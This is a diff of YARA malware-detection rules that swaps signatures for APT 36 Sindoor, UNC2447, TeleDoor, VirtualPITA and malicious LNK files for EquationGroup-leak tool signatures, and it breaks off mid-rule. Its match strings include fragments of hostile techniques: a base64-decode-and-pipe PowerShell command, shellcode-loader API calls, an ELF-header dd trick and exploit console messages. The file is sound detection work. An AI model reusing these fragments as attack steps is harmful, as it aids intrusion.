-		$x1 = "if ($MyInvocation.MyCommand.Path -match '\\S') {" ascii fullword
-		$s1 = "[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr " ascii wide
-		$s2 = "[Runtime.InteropServices.Marshal]::Copy($" ascii wide
-		$s3 = "[System.Diagnostics.Process]::Start((-join(" ascii wide
+		$x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
+		$x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
+		$x3 = "Generating shellcode" fullword ascii
+		$x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
+		$x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of ( $x* ) or 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_BAT_Runner_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance : FILE
 {
 	meta:
-		description = "Detects Batch script runners from UNC2447 campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0bacd4f7-421a-570f-9f74-5a19ab806dd0"
-		date = "2021-05-01"
-		modified = "2023-01-07"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L121-L135"
+		id = "40066023-ede9-5669-8b4d-a26a693d8818"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1912-L1930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f9872327f648e4421aa40ca3ce55df5d3eb5e8c5bc718ff62a3d4adac79217eb"
+		logic_hash = "757740038b9b1e1d099bb208104e9f48e7eb57ffb2de09e83c66df7914b816cb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ccacf4658ae778d02e4e55cd161b5a0772eb8b8eee62fed34e2d8f11db2cc4bc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
 
 	strings:
-		$x1 = "powershell.exe -c \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::" ascii
-		$x2 = "wwansvc.txt')))\" | powershell.exe -" ascii
+		$x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
+		$x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
+		$x3 = "[-] Error: Backdoor not present on target" fullword ascii
+		$x4 = "***********    TARGET ARCHITECTURE IS X64    ************" fullword ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Sindoor_ELF_Obfuscation_Aug25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen4 : FILE
 {
 	meta:
-		description = "Detects ELF obfuscation technique used by Sindoor dropper related to APT 36"
-		author = "Pezier Pierre-Henri"
-		id = "7e743c58-1e05-5387-af73-2df177386482"
-		date = "2025-08-29"
-		modified = "2025-09-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L1-L16"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f935c942-02a4-59b3-89ce-e5e3fa1cacda"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1932-L1963"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6879a2b730e391964afe4dbbc29667844ba0c29239be5503b7c86e59e7052443"
-		logic_hash = "c1258c1f6d4b49104bedf3fbef932f1775ede7d32191df2e5479ca9b291add9e"
-		score = 70
+		logic_hash = "68a85b4109a2222dce0625aae8a55541206b9275236232e5049e5b4ee28d8e52"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
+		hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
+		hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+		hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
+		hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
+		hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
+		hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
+		hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
+		hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+		hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
+		hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
+		hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
+		hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
+		hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$s1 = "UPX!"
+		$x1 = "[+] \"TargetPort\"      %hu" fullword ascii
+		$x2 = "---<<<  Complete  >>>---" fullword ascii
+		$x3 = "[+] \"NetworkTimeout\"  %hu" fullword ascii
+		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
 
 	condition:
-		filesize < 10MB and uint16( 0 ) == 0 and uint16( 4 ) > 0 and $s1 in ( 0xc0 .. 0x100 )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Sindoor_Desktopfile_Aug25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen1 : FILE
 {
 	meta:
-		description = "Detects ELF obfuscation technique used by Sindoor dropper related to APT 36"
-		author = "Pezier Pierre-Henri"
-		id = "69f97bb3-0fb8-5e36-a4f2-0b283744a59e"
-		date = "2025-08-29"
-		modified = "2025-09-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L18-L34"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59"
-		logic_hash = "1549aac3132c5f3e73d984c3404a5530507e967df4ab6d5ccd408abc874a5306"
-		score = 70
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "98b0a398-7761-5506-bd2f-117c118df11f"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1965-L1984"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "cd40d51ba26706517dae332d84f574eb206a424693cfb586375695e364990b5d"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
+		hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
 
 	strings:
-		$hdr = "[Desktop Entry]"
-		$s1 = "printf '\\\\x7FELF' | dd of"
-		$s2 = "Future_Note_Warfare_OpSindoor.pdf"
+		$x1 = "Restart with the new protocol, address, and port as target." fullword ascii
+		$x2 = "TargetPort      : %s (%u)" fullword ascii
+		$x3 = "Error: strchr() could not find '@' in account name." fullword ascii
+		$x4 = "TargetAcctPwd   : %s" fullword ascii
+		$x5 = "Creating CURL connection handle..." fullword ascii
 
 	condition:
-		filesize < 100KB and $hdr and any of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Sindoor_Decryptor_Aug25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen2 : FILE
 {
 	meta:
-		description = "Detects AES decryptor used by Sindoor dropper related to APT 36"
-		author = "Pezier Pierre-Henri"
-		id = "e79c4eef-b8ee-5ad6-b0dd-d021c5e6b62a"
-		date = "2025-08-29"
-		modified = "2025-09-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L36-L60"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e47de7dd-8a37-5d0d-9af2-2a30fa000b05"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1986-L2012"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b"
-		logic_hash = "4172fd9aee39a1a0681483f6dada6394debc62149a588ab4807e3016a823bed3"
-		score = 80
+		logic_hash = "2c0833e92e23d595ebcf4af042febc44fba594356a647eb98e48b6fabf018d72"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
+		hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
+		hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
+		hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
 
 	strings:
-		$s1 = "Go build"
-		$s2 = "main.rc4EncryptDecrypt"
-		$s3 = "main.processFile"
-		$s4 = "main.deriveKeyAES"
-		$s5 = "use RC4 instead of AES"
+		$s1 = "[+] Setting password : (NULL)" fullword ascii
+		$s2 = "[-] TbBuffCpy() failed!" fullword ascii
+		$s3 = "[+] SMB negotiation" fullword ascii
+		$s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
+		$s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
+		$s6 = "[*] Configuring Payload" fullword ascii
+		$s7 = "[*] Connecting to listener" fullword ascii
+		$op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 }
+		$op2 = { eb 59 8b 4c 24 10 68 1c 46 }
 
 	condition:
-		filesize < 100MB and ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of ( $s* ) and 1 of ( $op* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_MAL_Sindoor_Downloader_Aug25 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen3 : FILE
 {
 	meta:
-		description = "Detects Sindoor downloader related to APT 36"
-		author = "Pezier Pierre-Henri"
-		id = "9fbf4e4f-3a49-5ed9-af1b-7c3fbfdc5ef2"
-		date = "2025-08-29"
-		modified = "2025-09-02"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L62-L86"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7951fac1-9d5f-5991-a19a-88f3c8402e39"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2014-L2042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4"
-		logic_hash = "c55be65cd077cb04b625636dffcb02af74efa06bb49da734c8616da233a34d1a"
-		score = 80
+		logic_hash = "99b293d441fd27a6295e6a93123cf45e787472fb61575d566e7b4e0c61226fdb"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+		hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
+		hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
+		hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
+		hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
+		hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
+		hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+		hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
+		hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
+		hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
+		hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
+		hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$s1 = "Go build"
-		$s2 = "main.downloadFile.deferwrap"
-		$s3 = "main.decrypt"
-		$s4 = "main.HiddenHome"
-		$s5 = "main.RealCheck"
+		$s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
+		$s2 = "[-] Could not set \"CredentialType\"" fullword ascii
+		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
 
 	condition:
-		filesize < 100MB and ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them )
 }
-rule SIGNATURE_BASE_LNK_Malicious_Nov1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak : FILE
 {
 	meta:
-		description = "Detects a suspicious LNK file"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d08ac78-6ff0-5e3f-acc2-91bd63267d4c"
-		date = "2017-11-06"
+		id = "e5562d1a-7980-5fb8-b098-2e26003fb159"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_link.yar#L2-L26"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2054-L2070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1aa29497a0e4741807e3d74d54be69061aed21524c5f901615bd21e2ef13c67"
-		score = 60
-		quality = 81
+		logic_hash = "69b9514508f557376d876262793e5650289abfeeeee8b5ca9beaf42f3ec4d64c"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
 
 	strings:
-		$c1 = "C:\\Windows\\System32\\cmd.exe" ascii wide
-		$s1 = "cmd.exe /" ascii wide nocase
-		$s2 = { 00 25 00 53 00 79 00 73 00 74 00 65 00 6D 00 52
-              00 6F 00 6F 00 74 00 25 00 5C 00 53 00 79 00 73
-              00 74 00 65 00 6D 00 33 00 32 00 EF 01 2F 00 43
-              00 20 00 22 00 63 00 6D 00 64 00 2E 00 65 00 78
-              00 65 }
-		$s3 = "%comspec%" ascii wide nocase fullword
-		$fp1 = "Microsoft Visual" ascii wide
+		$x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
+		$x2 = "-------- driver start token -------" fullword wide
+		$x3 = "-------- keystart token -------" fullword wide
+		$x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x0000004c and filesize < 4KB and $c1 and 1 of ( $s* ) ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 2 of them )
 }
-rule SIGNATURE_BASE_Teledoor_Backdoor : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Aduser_Implant : FILE
 {
 	meta:
-		description = "Detects the TeleDoor Backdoor as used in Petya Attack in June 2017"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba9b4415-427e-5a13-b743-bed225d86db8"
-		date = "2017-07-05"
+		id = "4ba152c8-aa81-5558-8ad3-c62aa3231dab"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/CpfJQQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_teledoor.yar#L11-L31"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2072-L2086"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "785360fa19a61a547309fc7a8968c94d4887be001c6a66b41c7adb9dcd13cb82"
+		logic_hash = "d378773f4acd850e5a8d92d6cce84d57f659330edc025565cf4bc34afb0a6ae6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac"
-		hash2 = "f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740"
-		hash3 = "2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277"
+		hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
 
 	strings:
-		$c1 = { 50 61 79 6C 6F 61 64 00 41 75 74 6F 50 61 79 6C 6F 61 64 }
-		$c2 = { 52 75 6E 43 6D 64 00 44 75 6D 70 44 61 74 61 }
-		$c3 = { 00 5A 76 69 74 57 65 62 43 6C 69 65 6E 74 45 78 74 00 4D 69 6E 49 6E 66 6F }
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Implant : FILE
 {
 	meta:
-		description = "Finds opcodes to set a port to bind on 2233, encompassing the setsockopt(), htons(), and bind() from 40973d to 409791 in fe34b7c071d96dac498b72a4a07cb246 (may produce some FPs - comment by Florian Roth)"
-		author = "Mandiant"
-		id = "bdfbe29a-f7db-50d9-a909-d4ca96cc0731"
-		date = "2023-11-25"
-		modified = "2025-12-19"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L1-L13"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5fa5ff71-42fa-58e2-a826-341fb73ea08a"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2088-L2112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "7641f964cc4a7671a9a3438aad1c653ef3fda3887313846cbe838b275a098190"
-		score = 60
-		quality = 45
+		logic_hash = "aa46cb188ba820199c013633ade72ab1c8bea316384042e9e3b5098c439841a5"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
 
 	strings:
-		$x = { 8b ?? ?? 4? b8 04 00 00 00 [0-4] ba 02 00 00 00 be 01 00 00 00 [0-2] e8 ?? ?? ?? ?? 89 4? ?? 83 7? ?? 00 79 [0-50] ba 10 00 00 00 [0-10] e8 }
+		$op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00
+               00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00
+               65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00
+               00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68
+               5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00
+               63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00
+               6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00
+               57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00
+               44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00
+               6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00
+               00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00
+               53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Banner_Implant9X : FILE
 {
 	meta:
-		description = "Finds opcodes to decode and parse the recieved data in the socket buffer in fe34b7c071d96dac498b72a4a07cb246.  Opcodes from 401a36 to 401adc"
-		author = "Mandiant"
-		id = "6a59cc54-e1a0-594f-9efb-af63d5c05259"
-		date = "2022-10-01"
-		modified = "2025-12-19"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L15-L25"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7cbb509e-2a91-5e3c-8d19-61fda797cd8c"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2114-L2129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "56a3e1b13f0955a780f882e62003f721e409a1fdf61120dd295941605dbf21a4"
+		logic_hash = "5bda7b8ab097c0a5ca90b05147d4227e5a03735b99633b5081d80d2d72bceba9"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
 
 	strings:
-		$x = { 85 c0 74 ?? c7 05 ?? ?? ?? ?? fb ff ff ff c7 8? ?? ?? ?? ?? 00 00 00 00 e9 ?? ?? ?? ?? 4? 8b 05 ?? ?? ?? ?? 4? 83 c0 01 4? 89 05 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 e9 ?? ?? ?? ?? 8b 4? ?? 4? 98 4? 8d 9? ?? ?? ?? ?? 4? 8d ?? e0 4? 8b 0? 4? 89 0? 4? 8b 4? ?? 4? 89 4? ?? 8b 4? ?? 4? 98 4? 8d b? ?? ?? ?? ?? b? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 eb ?? 8b 4? ?? 8b 4? ?? 01 c1 8b 4? ?? 03 4? ?? 4? 98 0f b6 9? ?? ?? ?? ?? 8b 4? ?? 4? 98 0f b6 8? ?? ?? ?? ?? 31 c2 4? 63 c1 88 9? ?? ?? ?? ?? 83 4? ?? 01 }
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$op1 = { c9 c3 57 8d 85 2c eb ff ff }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Greatdoc_Dll_Config : FILE
 {
 	meta:
-		description = "Finds opcodes from 409dd8 to 409e46 in fe34b7c071d96dac498b72a4a07cb246 to set the HISTFILE environment variable to 'F' with a putenv() after loading each character individually."
-		author = "Mandiant"
-		id = "29ea2db0-4ab2-5e9c-8d42-7590ceabf99a"
-		date = "2022-10-01"
-		modified = "2025-12-19"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L27-L37"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "592e4e40-f5cd-5a11-8a1b-0cdcf6f267ec"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2131-L2147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "6f44d516b3cbe54542ae0991aad49274fc4728570e9498b319fc98840ceb7d7d"
+		logic_hash = "edb14cc9e51bbf6b3ca2c52f841edfa3df1ca89b3e7c1b5a59baf3a13be0fc46"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
 
 	strings:
